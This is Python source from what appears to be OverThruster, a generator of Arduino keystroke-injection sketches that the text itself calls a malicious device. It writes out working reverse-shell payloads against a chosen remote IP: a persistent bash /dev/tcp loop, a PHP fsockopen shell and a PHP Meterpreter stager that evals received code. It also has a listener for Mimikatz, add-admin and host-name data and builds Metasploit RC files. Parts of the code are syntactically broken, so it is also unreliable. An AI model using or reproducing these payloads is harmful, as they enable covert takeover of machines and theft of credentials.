def helperMenu(): menu = {} menu['1']="Invoke-Mimikatz/Add Admin/UserName and PCname Listener" menu['42']="Main Menu" menu['99']= "Exit" while True: HelperBanner() options=menu.keys() options.sort(key=int) for entry in options: print entry, menu[entry] selection=raw_input("\nPlease Select: ") if selection =='1': helperOption1() elif selection == '2': helperOption2() elif selection == '42': coreUtils.clearScreen() break elif selection == '99': exit() else: print "\n\n***That is not a valid option!***\n\n"
def LinuxMenu(): coreUtils.clearScreen() menu = {} menu['1']="Bash Reverse Shell without nc -e for Linux" menu['2']="Reverse Shell in PHP for Linux" menu['3']="meterpreter/reverse in PHP for Linux" menu['42']="Main Menu" menu['99']="Exit" while True: nixBanner() options=list(menu.keys()) options.sort(key=int) for entry in options: print(entry, menu[entry]) selection=input("\nPlease Select: ") if selection =='1': nixOption1() elif selection == '2': nixOption2() elif selection == '3': nixOption3() elif selection == '42': coreUtils.clearScreen() break elif selection == '99': exit() else: print("\n\n***That is not a valid option!***\n\n")
def generalInfo(): coreUtils.clearScreen() print("\n\n") print("GENERAL") print( "OverThruster is designed to facilitate creating Arduino sketches for devices with the AtMega32U4 chipset" ) print( "That can do keyboard emulation. Once plugged into a system, the malicious device will type out the contents" ) print( "of the selected payload, which include download and execute binaries, custom powershell execution and more" ) print( "Options include notification bubbles from system tray to distract users as well as UAC Bypass techniques" ) print("to get CMD prompts with elevated priveleges") print("\nREQUIREMENTS") print( "This tool requires the HID-Project library for all Windows payloads") print( "Which can be installed within the Arduino IDE: Sketch->.Include Library->manage Libraries and search for \"HID-Project\"" ) print("\nABOUT ME") print("You can find me on twitter at @bhohenadel") print("and on github at https://github.com/RedLectroid") print("Thanks to: @loneferret and @mycurial for...alot") print("\n") input("Please press Enter to return to the previous screen")
def osxWriteFile(fileName, payloadFunc, payload): buffer = "#include <Keyboard.h>\n" buffer += "void setup() {\n" buffer += " Keyboard.begin();\n" buffer += " openTerminal();\n" buffer += " delay(1500);\n" buffer += " " + payloadFunc buffer += " closeTerminal();\n" buffer += " Keyboard.end();\n" buffer += "}\n" buffer += "void pressEnter(){\n" buffer += " Keyboard.press(KEY_RETURN);\n" buffer += " delay(100);\n" buffer += " Keyboard.release(KEY_RETURN);\n" buffer += "}\n" buffer += "void openTerminal(){\n" buffer += " delay(500);\n" buffer += " Keyboard.press(KEY_LEFT_GUI);\n" buffer += " Keyboard.println(\" \");\n" buffer += " delay(150);\n" buffer += " Keyboard.release(KEY_LEFT_GUI);\n" buffer += " delay(100);\n" buffer += " Keyboard.println(\"terminal\");\n" buffer += " delay(100);\n" buffer += " pressEnter();\n" buffer += " pressEnter();\n" buffer += " delay(500);\n" buffer += "}\n" buffer += "\n" buffer += "void closeTerminal(){\n" buffer += " Keyboard.press(KEY_LEFT_GUI);\n" buffer += " Keyboard.println(\"w\");\n" buffer += " delay(150);\n" buffer += " Keyboard.release(KEY_LEFT_GUI);\n" buffer += " delay(100);\n" buffer += " pressEnter();\n" buffer += "}\n" buffer += "\n" buffer += payload buffer += "void loop()\n" buffer += "{\n" buffer += "}\n" fileName = coreUtils.checkINO(fileName) file = open(fileName, 'm') file.write(buffer) file.close() print "\n\noutput written to " + fileName raw_input("\nPress Enter to continue and return to Main Menu...") coreUtils.clearScreen()
def HelperBanner(): coreUtils.clearScreen() print "********************************************************************************************" print "* *" print "* *" print "* Helper Function *" print "* These options open up various listeners for the payloads *" print "* *" print "********************************************************************************************" print "\n"
def nixBanner(): coreUtils.clearScreen() print("********************************************************************************************") print("* *") print("* *") print("* Linux Payloads *") print("* These Payloads are made for linux, it's up to you to get a terminal open *") print("* *") print("********************************************************************************************") print("\n")
def osxBanner(): coreUtils.clearScreen() print "********************************************************************************************" print "* *" print "* *" print "* OSX Payloads *" print "* These Payloads are for OSX *" print "* *" print "********************************************************************************************" print "\n"
def listenerMode(): listener="" while True: coreUtils.clearScreen() print "This menu will let you select which mode the listener will be on" print "This option will decide the naming convention for the ouput files" print "Please select 1 or 2, then select to return to the previous menu" print "\n" menu = {} menu['1'] = "Set listener to Mimikatz" menu['2'] = "Set listener to Add Admin" menu['3'] = "Set listener to UserName and Computer Name" menu['42'] = "Back to previous menu" menu['99'] = "Exit" options=menu.keys() options.sort(key=int) for entry in options: print entry, menu[entry] print "\n\n" selection = raw_input("Please select a mode: ") if selection == '1': listener = "MimiKatz" elif selection == '2': listener = "addAdmin" elif selection == '3': listener = "userPCname" elif selection == '42': coreUtils.clearScreen() break elif selection == '99': exit() else: print "\n\n***That is not a valid option!***\n\n" return listener
def helperOption1(): done = False looper = False port="" listener="" while looper != True: coreUtils.clearScreen() print "********************************************************************************************" print "* *" print "* Listner *" print "* This helper listens on a specific port and write the relevant data to a file *" print "* Options are: 1.Listening Port *" print "* *" print "********************************************************************************************" print "\n" menu = {} menu['1'] = "Set the listening port" menu['2'] = "Set listener to mimikatz, Admin or User and PC Name mode" menu['3'] = "Start the listener" menu['42']= "Return to previous menu" menu['99']= "Exit" options=menu.keys() options.sort(key=int) for entry in options: print entry, menu[entry] print "\n\n" if port != "": print "Listening port this server set to -> " + port if listener !="": print "Listner Mode set to " + listener + " mode" selection=raw_input("\nPlease Select: ") if selection == '1': port = raw_input("Please enter the listening port on this server: ") elif selection == '2': listener = listenerMode() elif selection == '3': if done == False: print "\nYou have not set all the options" raw_input("Press Enter to return to the menu and set all the options") else: looper = True elif selection == '42': coreUtils.clearScreen() break elif selection == '99': exit() else: print "\n\n***That is not a valid option!***\n\n" if port != "" and listener != "": done = True if listener == 'MimiKatz': fileExtention = '-mimiKatz' elif listener == 'addAdmin': fileExtention = '-addAdmin' elif listener == 'userPCname' fileExtention = '-userPCname' if done == True and looper == True: port = int(port) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = ('', port) sock.bind(server_address) sock.listen(1) while True: try: print "Listening for a connection..." connection, client_address = sock.accept() print 'connection from', client_address[0] data = connection.recv(4096) if not data: print "no data from " , client_address[0] connection.close() break else: printData(client_address[0],data, fileExtention) except KeyboardInterrupt: if connection: connection.close() break finally: # Clean up the connection connection.close()
def nixOption3(): done = False looper = False remoteIP="" remotePort="" fileName="" RCfile="" while looper != True: coreUtils.clearScreen() print("********************************************************************************************") print("* *") print("* PHP Meterpreter Reverse TCP *") print("* This payload will initiate a meterpreter/reverse_tcp via PHP, requires PHP *") print("* Options are: 1. remote IP 2. Listening Port *") print("* *") print("********************************************************************************************") print("\n") menu = {} menu['0'] = "Info" menu['1'] = "Set IP address of the remote server" menu['2'] = "Set the listening port of the remote server" menu['3'] = "Set Arduino sketch filename" menu['4'] = "Set Metasploit RC File name" menu['5'] = "Write Arduino sketch" menu['42']= "Return to previous menu" menu['99']= "Exit" options=list(menu.keys()) options.sort(key=int) for entry in options: print(entry, menu[entry]) print("\n\n") if remoteIP != "": print("IP of the remote server set to -> " + remoteIP) if remotePort != "": print("Listening port on the remote server set to -> " + remotePort) if RCfile != "": print("Metasploit RC File name set to -> " + RCfile) if fileName != "": print("Arduino filename set to -> " + fileName) selection=input("\nPlease Select: ") if selection =='1': remoteIP = input("Please enter the IP address of the remote server to connect to: ") elif selection == '2': remotePort = input("Please enter the listening port on the remote server:") elif selection == '3': RCfile = coreUtils.getRCFileName('reverseMetPHP.rc') elif selection == '4': fileName = coreUtils.getFileName('reverseMetPHP.ino') elif selection == '5': if done == False: print("\nYou have not set all the options") input("Press Enter to return to the menu and set all the options") else: looper = True elif selection == '42': coreUtils.clearScreen() break elif selection == '99': exit() elif selection == '0': nfoCore.nix3info() else: print("\n\n***That is not a valid option!***\n\n") if remoteIP != "" and remotePort != "" and fileName != "" and RCfile !="": done = True if done == True and looper == True: payload = "void ReverseShell(){\n" payload += "Keyboard.println(\"php -r 'error_reporting(0); $ip = \\\""+remoteIP+"\\\"; $port = "+remotePort+"; if (($f = \\\"stream_socket_client\\\") && is_callable($f)) { $s = $f(\\\"tcp://{$ip}:{$port}\\\");" payload += " $s_type = \\\"stream\\\"; } elseif (($f = \\\"fsockopen\\\") && is_callable($f)) { $s = $f($ip, $port); $s_type = \\\"stream\\\"; } elseif (($f = \\\"socket_create\\\") && is_callable($f))" payload += " { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = \\\"socket\\\"; } else { die(\\\"no socket funcs\\\"); } if (!$s) { die(\\\"no socket\\\");" payload += " } switch ($s_type) { case \\\"stream\\\": $len = fread($s, 4); break; case \\\"socket\\\": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\\\"Nlen\\\", $len); $len = $a[\\\"len\\\"];" payload += " $b = \\\"\\\"; while (strlen($b) < $len) { switch ($s_type) { case \\\"stream\\\": $b .= fread($s, $len-strlen($b)); break; case \\\"socket\\\": $b .= socket_read($s, $len-strlen($b)); break;" payload += " } } $GLOBALS[\\\"msgsock\\\"] = $s; $GLOBALS[\\\"msgsock_type\\\"] = $s_type; eval($b); die();'\");\n" payload += " pressEnter();\n" payload += "}\n" payloadFunc = "ReverseShell();\n" nixWriteFile(fileName,payloadFunc, payload) coreUtils.msfRCfile(remoteIP,remotePort,'php/meterpreter/reverse_tcp',RCfile)
def nixOption2(): done = False looper = False remoteIP="" remotePort="" fileName="" while looper != True: coreUtils.clearScreen() print("********************************************************************************************") print("* *") print("* PHP Reverse Shell *") print("* This payload will initiate a reverse shell via PHP, requires PHP *") print("* Options are: 1. remote IP 2. Listening Port *") print("* *") print("********************************************************************************************") print("\n") menu = {} menu['0'] = "Info" menu['1'] = "Set IP address of the remote server" menu['2'] = "Set the listening port of the remote server" menu['3'] = "Set Arduino sketch filename" menu['4'] = "Write Arduino sketch" menu['42']= "Return to previous menu" menu['99']= "Exit" options=list(menu.keys()) options.sort(key=int) for entry in options: print(entry, menu[entry]) print("\n\n") if remoteIP != "": print("IP of the remote server set to -> " + remoteIP) if remotePort != "": print("Listening port on the remote server set to -> " + remotePort) if fileName != "": print("Arduino filename set to -> " + fileName) selection=input("\nPlease Select: ") if selection =='1': remoteIP = input("Please enter the IP address of the remote server to connect to: ") elif selection == '2': remotePort = input("Please enter the listening port on the remote server:") elif selection == '3': fileName = coreUtils.getFileName('revShellPHP.ino') elif selection == '4': if done == False: print("\nYou have not set all the options") input("Press Enter to return to the menu and set all the options") else: looper = True elif selection == '42': coreUtils.clearScreen() break elif selection == '99': exit() elif selection == '0': nfoCore.nix2info() else: print("\n\n***That is not a valid option!***\n\n") if remoteIP != "" and remotePort != "" and fileName != "": done = True if done == True and looper == True: payload = "void ReverseShell(){\n" payload += "Keyboard.println(\"php -r '$sock=fsockopen(\\\""+remoteIP+"\\\","+remotePort+");exec(\\\"/bin/sh -i <&3 >&3 2>&3\\\");'\");\n" payload += " pressEnter();\n" payload += "}\n" payloadFunc = "ReverseShell();\n" nixWriteFile(fileName,payloadFunc, payload)
def NixOption1(): done = False looper = False remoteIP="" remotePort="" fileName="" while looper != True: coreUtils.clearScreen() print("********************************************************************************************") print("* *") print("* Bash Reverse Shell without NetCat *") print("* This payload will initiate a Bash reverse shell without Netcat *") print("* Options are: 1. remote IP 2. Listening Port *") print("* *") print("********************************************************************************************") print("\n") menu = {} menu['0'] = "Info" menu['1'] = "Set IP address of the remote server" menu['2'] = "Set the listening port of the remote server" menu['3'] = "Set Arduino sketch filename" menu['4'] = "Write Arduino sketch" menu['42']= "Return to previous menu" menu['99']= "Exit" options=list(menu.keys()) options.sort(key=int) for entry in options: print(entry, menu[entry]) print("\n\n") if remoteIP != "": print("IP of the remote server set to -> " + remoteIP) if remotePort != "": print("Listening port on the remote server set to -> " + remotePort) if fileName != "": print("Arduino filename set to -> " + fileName) selection=input("\nPlease Select: ") if selection =='1': remoteIP = input("Please enter the IP address of the remote server to connect to: ") elif selection == '2': remotePort = input("Please enter the listening port on the remote server:") elif selection == '3': fileName = coreUtils.getFileName('reverseCMD.ino') elif selection == '4': if done == False: print("\nYou have not set all the options") input("Press Enter to return to the menu and set all the options") else: looper = True elif selection == '42': coreUtils.clearScreen() break elif selection == '99': exit() elif selection == '0': nfoCore.nix1info() else: print("\n\n***That is not a valid option!***\n\n") if remoteIP != "" and remotePort != "" and fileName != "": done = True if done == True and looper == True: payload = "void ReverseShell(){\n" payload += "Keyboard.println(\"nohup bash -c \\\"while true;do bash -i >& /dev/tcp/" +remoteIP+ "/" +remotePort+ " 0>&1 2>&1; sleep 1;done\\\" 1>/dev/null &\");\n" payload += " pressEnter();\n" payload += "}\n" payloadFunc = "ReverseShell();\n" nixWriteFile(fileName,payloadFunc, payload)